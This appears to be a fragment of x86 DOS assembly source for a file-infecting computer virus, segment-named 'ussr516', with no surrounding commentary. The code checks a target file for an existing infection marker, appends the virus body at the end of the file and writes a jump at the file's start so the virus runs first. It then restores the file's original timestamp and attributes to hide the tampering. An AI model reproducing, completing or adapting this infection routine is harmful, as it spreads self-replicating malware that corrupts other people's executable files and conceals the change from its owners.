mov ds:[buffer-start],ax ; new location offset
mov dx,orig4-start
mov cx,4
mov ah,3Fh ; Read 4 bytes there
call int21
mov dx,ds:[orig4-start]
cmp dl,0E9h ; 0E9h means we might
jne infect ; already be there
mov ax,ds:[orig4+2-start] ; continue checking
add al,dh ; to see if we really
sub al,ah ; are there.
jz quitinf
infect:
xor cx,cx
mov dx,cx
mov ax,4202h ; Go to EOF
call int21
mov ds:[buffer+2-start],ax ; save filesize
mov cx,204h
mov ah,40h ; Write virus
call int21
jc quitinf ; Exit if error
sub cx,ax
jnz quitinf
mov dx,ds:[buffer-start]
mov ax,ds:[buffer+2-start]
sub ax,dx
sub ax,3 ; AX->jmp offset
mov word ptr ds:[buffer+1-start],ax; Set up buffer
mov byte ptr ds:[buffer-start],0E9h; code the jmp
add al,ah
mov byte ptr ds:[buffer+3-start],al
mov ax,4200h ; Rewind to jmploc
call int21
mov dx, buffer-start
mov cx,4 ; Write in the jmp
mov ah,40h
call int21
quitinf:
mov cx,[bp-4]
mov dx,[bp-2]
mov ax,5701h ; Restore date/time
call int21
mov ah,3Eh ; Close file
call int21
mov cx,[bp-0Ah] ; Restore attributes
mov ax,4301h
call int21DSDX
jmp doneinfect ; Return
ussr516 ends
end stub